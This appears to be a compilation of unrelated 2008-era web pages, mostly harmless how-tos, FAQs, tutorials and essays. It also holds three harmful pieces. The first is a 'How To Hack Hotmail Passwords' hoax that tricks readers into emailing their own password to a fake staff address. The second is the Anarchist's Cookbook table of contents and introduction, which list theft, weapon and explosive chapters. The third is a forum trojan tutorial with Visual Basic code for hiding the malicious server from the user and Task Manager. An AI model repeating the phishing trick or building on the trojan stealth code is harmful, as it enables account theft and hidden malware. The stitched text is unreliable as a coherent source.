Do not eat around the computer.Do not drink around the computer.Do not use magnets around a computer.

Taking Care of disksDo:

Delete all files you no longer need from your disk.Use a anti virus program to scan for viruses on a disk.Do prevent erasing and recording information on a disk by write-protecting it.

Don't :

Do not use magnets around a disk.Do not take a disk apart.Do not remove the disk while it is in use.Do not store in extremely hot or cold locations.Do not spill liquids on the disk.

Cleaning Hardware

Follow instructions in the manual or in help files that came with thecomputer or other hardware devices.

Before cleaning anything, unplug it from the electrical wall socket.

When to clean a computer

Computers do not need to be cleaned too often if they are kept in a clean1.

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The chimney claw project http://www.linusakesson.net/hardware/chimneyclaw.php

1 2 3/4/2008 12:11

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The chimney claw projectOne year, my parents realized that there was a bird's nest down their chimney, at the very bottom. You could hear the chirps fromwithin the kitchen. Eventually, the chirps stopped, meaning that the young birds were either dead, or had managed to fly all theway up through the chimney on their maiden flight.

Let me give away part of the ending: There were no dead birds in the chimney.

Once the chirps had stopped however, my parents noticed that the kitchen fan did not work efficiently anymore. Thechimney-sweeps suggested that the best thing to do would be to basically rip out and replace the entire chimney; obviously avery expensive approach. I was a newly graduated software engineer at the time, and had recently taken a course inmechatronics, so I suggested (and constructed) something quite different:

What you see is a mechanical claw, somewhat larger than a human hand. It consists of a servo (a motor combined with an anglesensor), some gears and the actual claws. There are also some extra bright, white LEDs mounted on the frame.

The claw hangs from a long cable, providing power and a control signal to the servo. At the other end of the cable is a plasticbox with a power switch and a knob (actually a cog-wheel) on it. By turning the knob, you make the claw open and close. Insidethe plastic box are batteries and a programmable micro controller, whose job it was to continuously figure out what position theknob was in, and report this down the line to the servo.

This is what it looks like with the LEDs switched on:

So, having designed and built this contraption, the moment of truth had finally arrived:

These pictures are really bad, but they give you an idea of how deep it was:

Success! Lots of rubbish (or building material, if you're a bird) was brought up. The claw went down and up again several times,but the first two rounds brought up the bulk of it all.

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10 ways to improve your natural night vision: 2. Use your peripheral v... http://www.instructables.com/id/SM2KZ31F1A4Y1YG/

1 3 9/4/2008 2:42

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10 ways to improve your natural night visionby sam noyoun on May 14, 2007 in LIFE & HOME email it!

step 2 2. Use your peripheral visionUse your peripheral vision rather than looking directly at the object you're trying to see. This takes practice, but it really does work well.

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HDR photos with the GIMPA tutorial on making High DynamicRange photos using the GIMP orsimilar software.…by PKM

Making a Night-Vision Webcamhow to change your webcam so itcan see in the dark. The CCDs of alldigital camer…by leevonk

How to take AWESOME night p…This instructable will teach you howto use the normal digital camera youalready …by thesparine

Laser Wall ArtWith a laser and long exposuresphotography, you can create someworks of art on …by Solaryellow

Take digital photos through…The secret is to use "macro mode", afeature nearly all cameras havenow…by nickp

A better diy infrared filte…This instructable improves on myprevious post, Take Infrared PicturesWith Your D…by sam noyoun

1 … more related »


views: 40.643

category: life & home

keywords: improve, night, vision, see, darkness, military, special, forces, digital, camera, cellphone, ninja, pirate, noyoun

license: None (All Rights Reserved)

author: sam noyoun

published: May 14, 2007

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Hello WorldPrev: The Basics of C ProgrammingNext: Constants and Variables

Your First Program

Let's write and compile your first program!

But first of all it makes sense if you create a folder on your computer to store all your example programs.

Enter or copy the following code into your favorite text editor (e.g. Notepad, Emacs, SimpleText etc.) and save it with the .c extension. These MUST be saved in text only format - try and avoid word processors like MS Word. EditPad is also very good. Plus it's free - make sure you download it!!

#include <stdio.h>

int main() { printf("Hello World!\n"); return 0;}

If you're using MSVC++ go to "File -› New", click on the "Files" tab and select "C++ Source File". You should enter afilename and choose your folder to store your source file. Remember to give the file a .c extension to make sure thecompiler treats it as a C and not a C++ file. Press "OK" to begin editing.


When saving in Notepad you should surround a filename with quote marks, for example, "world.c". This ensures that thefilename will be saved with the correct extension, rather than world.c.txt, which is incorrect.


Compilation obviously varies from compiler to compiler - please read your compiler's help file or ask your course tutor.

If you are running gcc on UNIX then change to the folder containing world.c and enter cc world.c -o world and press enter to compile it. Then to run the program enter world and press enter.

On MSVC++ select "Build -› Build" (or press F7) and MSVC++ might ask if you want to create an active workspace - click"Yes" and it will do so automatically. The Build command will compile the file and create a Windows .exe file so that youcan run it. The Compile command simply compiles the file without creating the .exe file.

Then to run your program select "Build -› Execute" (or press Ctrl + F5).

The program simply writes "Hello World!" on the screen. We'll briefly analyze each part of the program...


If a line starts with a hash, denoted by #, it tells the compiler that a command should be sent to the C PREPROCESSOR.The C preprocessor is a program that is run before compilation takes place (hence the name). #include is one of the many C preprocessor commands you'll use.

Basically, when the preprocessor finds #include it looks for the file specified and replaces #include with the contents of that file. In a way, this makes the code more readable and easier to maintain if you needed to use common libraryfunctions. More preprocessor commands in the later sections.....

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Wolf's Tutorial #7 http://unreal.gamedesign.net/tutorials/7/wolftut7.html

1 4 10/4/2008 6:54

Wolf's Tutorials Part 7 -- Sky Boxes


To make those cool skies in Unreal you have to learn to make a sky box. A sky box is merely a "room" where you make your sky/outdoor area and then a ZoneInfo that acts as a sort of camera and is displayedon ceilings/walls that you set to "fake backdrop." Think of the SkyZone area as the "Stage" and the walls you set to display it the monitor (kind of). So, there are basically 2 components need. A skybox,and a surface set to "display" it.


To start with load the GenEarth textures. Now make a room 512 x 512 x 512. Give the ground a nice ground texture and don't worry about the walls, yet. Add a PlayerStart to this room wherever you want.Secondly, make another room the same size off to the side, away from the room you just built. Thisroom will be the SkyBox.

Inside this room make a box 256 x 256 x 128 "box" in the middle of the floor.

Now load the SkyBox textures. In your skybox select any wall and press SHITF-B to select the whole brush. Change the texture to the cloudy one at the bottom. Now select the whole "box" we added to the middle of the room and change it's texture to the ground (GRD) texture. Your skybox should look likethis now:

If you look at the textures in the skybox package (the ones like LND1 LND2 etc...) you will notice they look like mountains but with a black background. These are masked walls that will be the sides of our sky box. First, make sure no textures are selected and then right click the sheet tool to bring up the sheet properties. Set the properties to X wall, U:256 V:128 like below:

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Hardgainer Bodybuilding & Weightlifting FAQ http://www.faqs.org/faqs/body-building/hardgainer-faq/

1 20 11/4/2008 2:07

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Hardgainer Bodybuilding & Weightlifting FAQThere are reader questions on this

topic!Help others by sharing your


Message-ID: <body-building/[email protected]>X-Last-Updated: 1999/12/05From: [email protected]: alt.sport.weightlifting, misc.fitness.weightsSubject: Hardgainer Bodybuilding & Weightlifting FAQReply-To: [email protected]: This posting contains a list of Frequently asked questions and their answers about the "Hardgainer" method of body-building / weight-lifting.Date: 17 Apr 2004 11:26:38 GMT

Archive-name: body-building/hardgainer-faqPosting-Frequency: MonthlyLast-Modified: 29th November 1999Version: 1.254

THE HARDGAINER BODYBUILDING / WEIGHTLIFTING FAQ by Frank J. Kelly ([email protected]) Craig R. Sadler (zia%[email protected])


Recent Changes


Where can I find this FAQ?

(1) Hardgainers--------------- 1.1 What is a "hardgainer"? 1.2 Am I a hardgainer? 1.3 What is overtraining / How do I know if I am overtraining? 1.4 What kind of results/gains can a Hardgainer expect? 1.5 What costs are involved?

(2) The Hardgainer Method of training------------------------------------- 2.1 What exercises should I do? 2.2.1 What are the basic movements? .2 What exercises can be ignored and/or are dangerous? 2.3.1 How often should I work out? .2 How many sets and reps are required? 2.4 What equipment is required? 2.5 What does an example Hardgainer workout look like? 2.6 What must hardgainers focus on and what can they ignore?

(3) Intensity Cycling--------------------- 3.1 What is Intensity Cycling? 3.2.1 Why do athletes cycle intensity? .2 Why MUST hardgainers cycle intensity? 3.3 How do I put a cycle together? 3.4 What happens to a cycle when I get sick? 3.5 What are the keys to a cycle? 3.6 Will I lose muscle mass and strength if I cycle my intensity?

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Free 3D Tutorials & CG Tutorials http://www.free3dtutorials.com/modeling/3d-max/centuried-street.php...

1 2 9/4/2008 12:08

"Centuried Street " in Weiye Yin

The picture above is the reference material that I find the works sought is the feeling combined with Tibet building in a kind of traditional building of China. The moist ground , the high wall, the far-reaching street, appear a kind of mystery.

First of all, I have drawn the TEXTURE MAP, it superposed through one layer of ones that is with layer in PHOTOSHOP, used the material of some stone photo, Make out the feel of the red wall .

3Dtutorials.sk recommendation:To maximise the realism of your textures we recommend to use high quality photo textures from the #1 texture website www.environment-textures.com

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Inventgeek.com - Ion Cooler 3.0 - Page 2 http://www.inventgeek.com/Projects/diamondgrease/Page2.aspx

1 2 9/4/2008 10:26

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The diamond powder is very abrasive and is a hazard if inhaled. You should mix it in asmall container with a closable lid. To make our own mixer we will start by bending apaperclip into a stirring paddle. the depth of the stirrer should be as deep as thecontainer you have.

I found a small ear plug container in my assorted parts bin to use for this but a filmcanister would work well to, and in hind site I think a small ziplock bag and justsquishing it would work real well also. Poke a hole in the lid for the stirrer and insertthe bent paperclip .

Safety is king in the project. I thought it was funny i got this little branded reminder on my mixer.

Now we just add our ingredients. At a minimum I recommend using a good dust mask whenadding the diamond powder. We are mixing 13 grams total of our compound, 5 diamonds, 4grams Polydimethylsiloxane, 4 grams Polytetraflouroethylene.

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How to Become a Creative Genius - Lifehack.org http://www.lifehack.org/articles/lifehack/how-to-become-a-creative-ge...

1 13 22/4/2008 4:12


Latest Featured Posts: Do You Read Too Many Blogs?, How to Improve Your Memory, Polish Your Writing to Professionalism: Three Tips for Self-Editing, Following Email Etiquette, Your Individual Development Plan.more...

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How to Become a Creative Genius

When we measure the creativity of young children, virtually all of them will record as being ‘highly creative’.However, only a small percentage of adults register as being ‘highly creative’.

What happened?

Schools have crushed creativity. We were told to color within the lines. We were taught to follow instructions. The goal inschool is to get the “right” answer. Unfortunately, if you’re afraid to be wrong, you’ll never be creative ororiginal.

The job of education is to produce employees who follow instructions. And to this endeavor, they are doing avery good job. However, in terms of creativity, they are falling terribly short.

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How to Become a Creative Genius - Lifehack.org http://www.lifehack.org/articles/lifehack/how-to-become-a-creative-ge...

1 13 22/4/2008 4:12


Latest Featured Posts: Do You Read Too Many Blogs?, How to Improve Your Memory, Polish Your Writing to Professionalism: Three Tips for Self-Editing, Following Email Etiquette, Your Individual Development Plan.more...

All PostsFeaturedProductivityCommunicationLifestyleMoneyTechnologyManagement

How to Become a Creative Genius

When we measure the creativity of young children, virtually all of them will record as being ‘highly creative’.However, only a small percentage of adults register as being ‘highly creative’.

What happened?

Schools have crushed creativity. We were told to color within the lines. We were taught to follow instructions. The goal inschool is to get the “right” answer. Unfortunately, if you’re afraid to be wrong, you’ll never be creative ororiginal.

The job of education is to produce employees who follow instructions. And to this endeavor, they are doing avery good job. However, in terms of creativity, they are falling terribly short.

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Ultimate Brain TrainerActivate your mind, increase IQ, & build more neural connections now!www.GetiMusic.com

MindMap and PresentationHard In Plan, Meetings, Speeches? Buy XMIND by 50% discount today!www.Xmind.org

Creativity and InnovationWant to be creative? You need value innovation processes & tools www.valueinnovations.com

Maximize Visual ThinkingDigitize Your Mind. Create Visual Mind Maps of Files, Ideas, & More www.TheBrain.com

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Inventgeek.com - Airsoft Turret 2.0 - Page 6 http://www.inventgeek.com/Projects/Airsoft_Turret_v2/page6.aspx

1 3 9/4/2008 10:27

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With the frame bent and drilled use some aluminum rod the same diameter as the hole youdrilled and pound it into the holes (it should be tight). Drill the opposing holes out1/16th larger so the rods spin freely. Use washers to help center the cradle. Cut anyprotruding material into the center space of the cradle flush so it won’t bind on the gunitself.

Next hot glue the inner part of the frame to the air soft turret. Any gaps just pump extraglue into to make sure a good strong bond is made. it is important to get this as close aspossible to the center of balance as possible.

How To Become A Hacker http://catb.org/~esr/faqs/hacker-howto.html

1 16 9/4/2008 1:36

How To Become A Hacker

Eric Steven Raymond

Thyrsus Enterprises

<[email protected]>

Copyright © 2001 Eric S. Raymond

Revision HistoryRevision 1.38 8 Jan 2008 esrDeprecate Java as a language to learn early.Revision 1.37 4 Oct 2007 esrRecommend Ubuntu as a Unix distro for newbies.Revision 1.36 21 Mar 2007 esrAdd note about live CDs, and ten years to mastery.Revision 1.35 03 Aug 2006 esrMinor fixes.Revision 1.34 07 Mar 2006 esrRemove C# from the list of languages to be avoided now that Mono is out of beta.Revision 1.33 29 Nov 2005 esrAdd a pointer to Peter Norvig's excellent essay.Revision 1.32 29 Jun 2005 esrSubstantial new material on not solving problems twice. Answer a FAQ on hacking and open-sourceprogramming. The three questions that reveal if you are already a hacker.Revision 1.31 22 Mar 2005 esrAdded a link to another Paul Graham essay, and advice on how to pick a first project. More translation-linkupdates.Revision 1.30 2 Mar 2005 esrAdded and updated many translation links.

Table of Contents

Why This Document?What Is a Hacker?The Hacker Attitude

1. The world is full of fascinating problems waiting to be solved.2. No problem should ever have to be solved twice.3. Boredom and drudgery are evil.4. Freedom is good.5. Attitude is no substitute for competence.

Basic Hacking Skills1. Learn how to program.2. Get one of the open-source Unixes and learn to use and run it.3. Learn how to use the World Wide Web and write HTML.4. If you don't have functional English, learn it.

Status in the Hacker Culture1. Write open-source software

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[alt.life.itself] Here are the answers

From: [email protected] (Julian Palmer)Newsgroups: alt.life.itselfSubject: [alt.life.itself] Here are the answersDate: Sun, 18 May 1997 16:19:32 +1000Message-ID: <[email protected]>Summary: The Frequently Asked Questions for the alt.life.itself newsgroupArchive-name: alt-life-itself/faqPosting-Frequency: sometimesLast-modified: 2nd of November, 1996.Version: 1.0URL: http://www.julian.org/ali/faq.htmlCopyright: (c) 1996 Julian PalmerMaintainer: Julian Palmer <[email protected]>

The alt.life.itself FAQ

1. What is the topic of this group?

There is no real topic per se. This group was created for the discussionof this life free of anything at all. This means being free of any systemssuch as religion and philosophy, and explaining ones experience and"knowledge" in ones own words. The idea of this group is to leave behind belief, thought and any"secondhand" knowledge and to communicate the real and raw experience ofthis life. This involves the transcending of terminology, systems,tradition so as to see things as they are. Direct communion orcommunication with "reality" has been called mysticism in the past, butsomething more real and everyday is required.

2. What is appropriate material to post to this group?

Any thing at all; thoughts, essays, problems, experiences, extracts ofwriting, favourite web sites, movies, transcripts of IRC/email etc. Thereis no boundaries constraining the exact content of your posts.

3. What is not encouraged on this group?

Usenet is a reflection of those who use it. There is no all that much thatcan be done to stop people playing the "predator" games in an unmoderatedgroup. The predator games can even be _used_ to further understand yourown life tactics and those of others.

4. Who created this group and why?

I (Julian Palmer) created the groups because I felt there was a need for agroup that wasn't specifically defined in its approach to life.There is the group hierarchy alt.consciousness, but the word consciousnesshas certain connotations and limitations.

5. What kind of worldview is promoted in this group?

There is no real worldview that needs to be promoted, no proselytisingthat needs to be done. This group was not created around my book "In Life Itself", yet this bookwill give anyone an idea of my "philosophy" if you like, and it was fromthis "philosophy" that I created this group.

6. What kinds of religions, philosophies or systems is the idea of thisgroup sympathetic to?

This group should be neither for or against any specific philosophy orreligion or approach to life. That is the point of the group idea. It isfine for people to refer to any teachings of a philosophy or religion orsystem or television program or movie or book or whatever, but these

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How to Host a Green Event - wikiHow http://www.wikihow.com/Host-a-Green-Event

1 4 19/4/2008 2:50


How to Host a Green Event

Having a party? Follow these simple steps and find out how you can achieve thetriple goals of saving money, serving better food and taking care of the planet.Just because you want to go "green", it doesn't mean you need to cut back on

the good times. Green events still enable you to enjoy events and be healthy and environmentally-friendly at the same time.

StepsUse washable plates and utensils. It is always best to use what can be reused

again and again, so prefer crockery over disposables. Alternatively, many stores now carry recycled, compostable platesthat will go right into your composteror can be thrown away. They biodegrade quickly so they won't take up landfill space. You can find sturdy plastic cutlerymade from corn or other plant sources everywhere, or visit a thrift store and buy up big on old metallic cutlery just for yourgreen events. Whether you use plastic or metallic cutlery, be sure to tell guests to put the cutlery in the wash and not thebin so that they can be reused many times. It helps to leave a container with water and suds in it for people to put theirused cutlery straight in.


Go organic. Preservatives and substitutes like high fructose corn syrup and partially

hydrogenated oils aren't doing your body any good. Find certified organic food at most grocery stores. Better yet, find afarmer's market where you can talk to the farmer directly and ask questions about where your food came from. You cancomplement your fresh, organic food with a little organic wine! These days you don't need to be a sommelier to find a goodbottle of organic vino. If you don't want to cater yourself, hire a local caterer who is well versed in using local, organicproduce and supports the concept of sustainable dining.[1]



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How to Write a Short Story - Mahalo http://www.mahalo.com/How_to_Write_a_Short_Story

1 8 19/4/2008 2:26

How to Write a Short Storyby Jenny Hudock

Guide Note:

Have you always wanted to try your hand at creative writing? Maybe you've got a story you've been thinkingabout for years, but weren't quite sure you'd be able to put it into words. How to Write a Short Story describes the techniques and practices that will help you put your ideas into short story form so you can share them with the world, or maybe just your closest friends.

Table of Contents:

IntroductionRead, Read, Read!The Basic ComponentsThe Story in Three PartsStep 1: Turn on the Idea MachineStep 2: Research and OutlinesStep 3: The Writing ProcessStep 4: EditingConclusionResources


(Creative Commonsphoto by Fabio)

There is something about storytellers that fascinates each and every one of us. Whether it's a good book, astory in a magazine or the classic tale told around the campfire, the elements of those stories hold us enthralled.If you are writing as a result of an English class assignment, or you've just always wanted to try your hand at creative writing, the short story is a great place to start.

Believe it or not, each story, no matter what genre it falls under, contains the same basic elements. Characters, dialogue, setting and action follow a simple pattern of events to a climax, and as the tension and excitement build, so does the story itself.

Read, Read, Read!

(Creative Commonsphoto by kalandrakas)

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How To Hack Hotmail Passwords

This is the best way to hack anyone’s Hotmail password. First, open a

new email message. Type in the “To:” box this email address:

[email protected]. This is the email robot that Hotmail staffers

use to check user accounts. In the subject line, type “CHK PASSWD” (type

this in upper case *exactly* as shown). In the body, type on the 1st

line your hotmail address (ex: [email protected]). On the 2nd line, type

your password. And on the 3rd line, type the email address you want to

hack (ex: [email protected]).

You must add “;” (no quotes!) at the end of each line so their server

will process it as a command.

Here is an example of what the email should look like:

To: [email protected]


[email protected];


[email protected];

The security hole has been well documented on BugTraq, but those lamers

at Hotmail haven’t fixed it yet. Get it while you can! :-P

How To Play Against Better Golfers | How To Do Things.com http://www.howtodothings.com/sports-recreation/how-to-play-against-...

1 2 21/4/2008 12:02




By Alan Hammond

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How To Play Against Better GolfersAdvice to Make Golf Competition Much More Fun

Whether you're preparing to play in a casual foursome with highly skilled golfers (or at least golfers

who play better than you do), or getting set to tee-off in a tournament against single-digit

handicappers, it is only natural to feel nervous. We often are held back from playing our best by

those feelings. It need not be that way.

With some effort on your part, and by following the suggestions below, you'll go a long way toward

conquering your fears and breaking down a major obstacle in the improvement of your golf game.

Forget what you may think others are thinking about your golf game. First, other golfers

are too concerned with their own play on the golf course to waste much time thinking about your

game. Second, the only people who may be justified in criticizing your game have the term "Golf

Professional" after their names. The rest of us are not too far removed from bogey golf. The fact

is that most everyone you play with will not be as critical about your golf game as you may

think. If they are overly critical, all you have to do is wait a few minutes until they make a poor



Rid yourself of that fear of failure. This one sort of goes hand-in-hand with the first tip. Even

the people who call themselves golf professionals fail more times than they succeed in every

round of golf. Although we remember the times we miss a short putt or hook a drive out of

bounds, those shots are simply a part of history. We will never miss those same putts again.

Many past bad shots were also likely brought about by lack of concentration due to worrying

about what others think, as described above.


Develop and stick to a game plan. Having a game plan does a couple of things for you. First,

it keeps you focused on the course and how you will attack each shot. Second, through that

concentration, it prevents self-doubt and fear of embarrassment from creeping in. If you allow

your mind to stray to unproductive thoughts, just bring them back to the game plan. Your goals

for your round of golf are more important than what others may, or may not, be thinking.


Play the course, not other people. You have no control over the way someone else plays. By

using your game plan to play the course to the best of your ability, you will maximize your

scoring possibilities.


Don’t compare yourself to others. Everyone you compete against in golf is at a different level

of skill. Golfers who play at the highest level had to first pass through your level. Focus on

playing your own game.


It may not be an overnight success, but practice implementing these tips and inserting steps that

only you know will work for you. You’ll be surprised at how well you will perform by not worrying

about your competitors. To paraphrase what Jay Leno has been quoted as saying when referring to

his success as a comedian, "Just keep the car in your lane, and watch everyone else spin

uncontrollably off the highway."

Alan L. Hammond is the Golf Feature Writer for Suite101.com and Golf Travel Writer for

Tripwiser.com and Suite Golf Travel.

Useful Links:

Suite101.com GolfUnited States Golf Association

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The Simple Golf SwingGolf tips to help shave 7-12 strokes off your game www.golfswingguru.com

Super Natural GolfThe Longest, Most Accurate, Most Consistent Golf Swing Ever. Simplegolf.com

Can You Drop 7-10 Shots?I'll Take You By The Hand & Show You How In 5 Minutes. No Kidding. www.Break80Today.com/handicap

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Improve Your Golf SwingHit the ball perfectly every time Knock 7-14 strokes off your game! www.Cis-Golf.com

Free Analysis SoftwareAdvanced, unique features. Download now. Improve your game.www.digitalprogolf.com

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I chose use the Newtonian Method and made the following function:

Comment: ----------------------------------------------Comment: Newton’s Method for Finding Square RootComment: ----------------------------------------------Set Variable: “n” = 1Set Variable: “counter” = 0Loop While (counter<iterations) Set Variable: “n” = n - ((n*n - input) / (2*n)) Set Variable: “counter” = counter+1End LoopSet Variable: “/:output” = n

worldAABB.maxVertex.Set(1000.0, 1000.0);

// Define the gravity vectorvar gravity:b2Vec2 = new b2Vec2(0.0, 300.0);

// Allow bodies to sleepvar doSleep:Boolean = true;

// Construct a world objectm_world = new b2World(worldAABB, gravity, doS-leep);

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Inventgeek.com - Ion Cooler 2.0 - Page 2 http://www.inventgeek.com/Projects/IonCooler2/Page2.aspx

1 2 10/4/2008 5:56

project overview - the view from high above

materials overview - what parts will you need

modification - preparing for the real work

assembly part 1 - square peg in a round hole

assembly part 2 - round peg in a square hole

final thoughts - its over!

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Step one in our construction process is to cut the fan out of the fans mounting bracket.This is easily done with some wire snips. If your want to keep the lighting ringfunctional on the fans bracket make sure to leave some leads to work with. Also save theconnection to the Molex connector to the power supply and the wire length for later on inthe build.

Next up is to take our cd case and cut the top off of it. This can easily be done with asharp razor. But use caution in doing this step as plastic can be tricky and slip or crackwith out warning.

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The ____________________________________________________________________________| # # | | | | | | | | | ||______|#__#__|______|______|______|______|______|______|______|______|______| ############ | | | | | | | | |__##|____##|____##|______|______|______|______|______|______|______|______|___|# |# # | # | | | | | | | | |#______#____#_|____#_|______|______|______|______|______|______|______|______|# | # | # |# | | | | | | | |####################__N__A__R__C|_H__I_|S__T__’__S___|______|______|______|___# # | # # | | | | | | | | |#____#_|______#____#_|______|______|______|______|______|______|______|______| # # | # # | | | | | | | |__##|______|____##|______|______|______|______|______|______|______|______|___| # ############ # | | | | | | | | ||#_____|______|___#__|______|______|______|______|______|______|______|______|

Cookbook Vol 1. First Release: June 1st 1985_______________________________________________________________________________

The Anarchist’s Cookbook._______________________________________________________________________________

Table Of Contents:_______________________________________________________________________________ I An Introduction to the Anarchial Arts. Pg. 3 II The Tools of the Arts................. Pg. 4 III Mild Anarchism........................ Pg. 5 IV Anarchy for Amusement................. Pg. 6 V Anarchy for Profit..................... Pg. 8 VI Havoc and Hell........................ Pg. 10 VII The Black Arts........................ Pg. 12 VIII Theft:................................ Pg. 13 A Single Party Theft.............. Pg. 14 B Multiple-Party Theft............ Pg. 15 C Other Forms of Theft............ Pg. 16 IX Destruction:.......................... Pg. 19 A Home Made Weapons............... Pg. 21 B Interesting Ideas............... Pg. 22 C The Fun Part.................... Pg. 23 X Deception............................. Pg. 24 XI Sub-Forms............................. Pg. 25 XII Weapons and Explosives:............... Pg. 26 A Home-Made Explosives............ Pg. 27 B Chemical Explosives............. Pg. 39 XIII General Anarchy....................... Pg. 41 XIV More Easy Gadgets..................... Pg. 43 XV Complex Explosives:................... Pg. 50 A Common “Weak” Explosives........ Pg. 51 B Thermite Reactions.............. Pg. 53 C Nitrogen-Containing High Exp.... Pg. 54 D Other Stuff..................... Pg. 56 XVI Stars, Flares, and Color Mixtures..... Pg. 57 XVII The Chemistry of Pyrotechnics......... Pg. 64 Note Sheets........................... Pg. 70


Chapter One: An Introduction to the Anarchial Arts_______________________________________________________________________________

First off, I guess I must allot for those of you who don’t know what I mean when I say Anarchy. (ALWAYS capitalize that word...don’t forget!) Well, maybe I should start off with a definition..

Anarchy: <`an-ahr-kee>...noun. 1. A social structure without law and order, government, or authority. 2. Utter confusion. 3. A rebellion against what’s accepted as right or correct.

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Recycle Plastic Shopping Bags into 'Yarn': Unfold one of the cut strips... http://www.instructables.com/id/S7PRGIXFEAHE9GR/

1 2 8/4/2008 9:50

next step »« previous step

Recycle Plastic Shopping Bags into 'Yarn'by tlmacnolan on Apr 1, 2008 in CRAFT & GREEN email it!

step 5 Unfold one of the cut strips and begin joining.Unfold one of the cut strips. You need to be careful here because they will sometimes tear on the fused seam.

Grab a second cut strip and unfold it. Loop it around your thumb and index finger and hold the rest of it in your fist.

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Joining & Crocheting Recycl&hellip;A quick video on how to join recycled plastic shopping bags and crochet them. by tlmacnolan

A TOTE-ally easy way to hel…I've got one, my friends have them,and I'm willing to bet you've got one,too. Oh…by LauPre

Aluminum Can Granny Square …This is my homemade tote bag madeof sheets of aluminum (beer cans),an old t-sh…by sparkleponytx

Large ceiling lampThis is a large ceiling lamp made outof a woven plastic bag, some bits ofplywood…by Zak

Save space when storing pla…This video shows how to fold asupermarket plastic bag to savespace to store the…by marcelo7300

Customize your reusable sho…You're lean and green - you've cutthose plastic grocery totes out of yourlife. B…by Lorena

1 … more related »


views: 4.076

category: craft & green

keywords: recycled plastic bags, crocheting plastic bags, plastic bags

license: Attribution-NonCommercial-ShareAlike

author: tlmacnolan

published: Apr 1, 2008

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[ Usenet FAQs | Search | Web FAQs | Documents | RFC Index ]

alt.gothic FAQ v3.2There are reader questions on this topic!Help others by sharing your knowledge

From: Tom Fosdick <[email protected]>Newsgroups: alt.gothicSubject: alt.gothic FAQ v3.2Date: 14 Jun 1998 18:48:27 +0100Message-ID: <[email protected]>Summary: Frequently Asked Questions for the newsgroup alt.gothic, please read before posting

Archive-Name: alt-gothic-faqPosting-Frquency: monthlyLast-Modified: 14 April 1998URL: ftp://ftp.maths.tcd.ie/pub/music/gothic/alt-gothic-faqMaintainer: [email protected] (Tom Fosdick)Version: 3.2

FREQUENTLY ASKED QUESTIONS LIST FOR ALT.GOTHIC NEWSGROUP _________________________________________________________________

NOTE: To help reduce email 'spam' the email addresses within this document have had the '@' symbol replaced with a '#'. To mail any of them please change this back.

This FAQ was created by Peter Wake (peterw#cs.man.ac.uk), and is currently maintained by Tom Fosdick (aka Bloodstone). Please send all comments, corrections, suggestions for new questions and hate-mail to him at tom#midnight.karoo.co.uk It is posted on the 14th of every month to the newsgroup alt.gothic.

This document is available from the following places.

Primary FTP siteftp.maths.tcd.ie:/pub/music/gothic/alt-gothic-faq mirrored atgoth-ftp.acc.brad.ac.uk:/ftp.maths.tcd.ie/gothic/alt-gothic-faq

Primary WWW sitehttp://www.darkwave.org.uk/faq/ag/

If your are new to newsgroups the news.newusers FAQs are also recommended, available from ftp://rtfm.mit.edu and its mirror sites and on the newsgroup news.announce.newusers. You may also want to take a look at the news.announce.newusers archives at the same site.





Changes From Version 3.1.

Section: 1A Charter

Section: 1B Charter Questions and General Newsgroup Stuff.

Subject: 1.1 What is this newsgroup really about then? Subject: 1.2 Are there any subjects I should avoid? Subject: 1.3 What type of material is appropriate for this group? Subject: 1.4 What are all these abbreviations? Subject: 1.5 What is this GothCode? Subject: 1.6 What is a net.goth? Subject: 1.7 What is this Goth Test? Subject: 1.8 What is a troll? Subject: 1.9 What is AGSF (alt.gothic Special Forces) Subject: 1.10 How do I identify a net.goth? Subject: 1.11 What's with all these "Is XXXXX gothic" questions? Subject: 1.12 What is the [AG] tag? Subject: 1.13 What do you have against Marilyn Manson? Subject: 1.14 I want to post a picture/sound, can I do it?

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Steve Friedl's Unixwiz.net Tech Tips An Illustrated Guide to Cryptographic Hashes

Table of Contents

What is a cryptographic hash?1.

Hashes are "digests", not "encryption"


How are hashes used?3.

But what about collisions?4.

What's inside a cryptographic hash?


"Collision resistance" in more detail


So what's the big news?7.

What does this mean?8.

Other voices9.

With the recent news of weaknesses in some common security algorithms (MD4, MD5, SHA-0), manyare wondering exactly what these things are: They form the underpinning of much of our electronicinfrastructure, and in this Guide we'll try to give an overview of what they are and how to understandthem in the context of the recent developments.

But note: though we're fairly strong on security issues, we are notcrypto experts. We've done our best to assemble (digest?) the bestavailable information into this Guide, but we welcome being pointedto the errors of our ways.

What is a cryptographic hash?

A "hash" (also called a "digest", and informally a "checksum") is a kind of "signature" for a stream ofdata that represents the contents. The closest real-life analog we can think is "a tamper-evident sealon a software package": if you open the box (change the file), it's detected.

Let's first see some examples of hashes at work.

Many Unix and Linux systems provide the md5sum program, which reads a stream of data andproduces a fixed, 128-bit number that summarizes that stream using the popular "MD5" method. Here,the "streams of data" are "files" (two of which we see directly, plus one that's too large to display).

$ cat smallfileThis is a very small file with a few characters

$ cat bigfileThis is a larger file that contains more characters.This demonstrates that no matter how big the inputstream is, the generated hash is the same size (butof course, not the same value). If two files havea different hash, they surely contain different data.

$ ls -l empty-file smallfile bigfile linux-kernel-rw-rw-r-- 1 steve steve 0 2004-08-20 08:58 empty-file-rw-rw-r-- 1 steve steve 48 2004-08-20 08:48 smallfile-rw-rw-r-- 1 steve steve 260 2004-08-20 08:48 bigfile-rw-r--r-- 1 root root 1122363 2003-02-27 07:12 linux-kernel

$ md5sum empty-file smallfile bigfile linux-kerneld41d8cd98f00b204e9800998ecf8427e empty-file75cdbfeb70a06d42210938da88c42991 smallfile6e0b7a1676ec0279139b3f39bd65e41a bigfilec74c812e4d2839fa9acf0aa0c915e022 linux-kernel

This shows that all input streams yield hashes of the same length, and to experiment, try changingjust one character of a small test file. You'll find that even very small changes to the input yieldssweeping changes in the value of the hash, and this is known as the avalanche effect.

The avalanche effect can be best seen by hashing two files with nearly identical content. We've

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A simple trojan tutorial - rohitab.com - Forums http://www.rohitab.com/discuss/index.php?showtopic=11128

1 6 10/4/2008 6:35

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A simple trojan tutorial, Vb

DesTruCtiV3 ChiL... Post #1

Full Member

Group: MembersPosts: 362Joined: 20-September 04Member No.: 3,415

Writing a Trojan is a lot easier than most people think. All it really involves is two simple

applications both with fewer than 100 lines of code.

The first application is the client or the program that one user knows about. The second is

the server or the actual “trojan” part. I will now go

through what you need for both and some sample code.


The server is the Trojan part of the program. You usually will want this to be as hidden as

possible so the average user can’t find it.

To do this you start by using


Private Sub Form_Load()

Me.Visible = False

End Sub

This little bit of code makes the program invisible to the naked eye. Now we all know that

the task manager is a little bit peskier.

So to get our application hidden from that a little better we make our code look like this.


Private Sub Form_Load()

Me.Visible = False

App.TaskVisible = False

End Sub

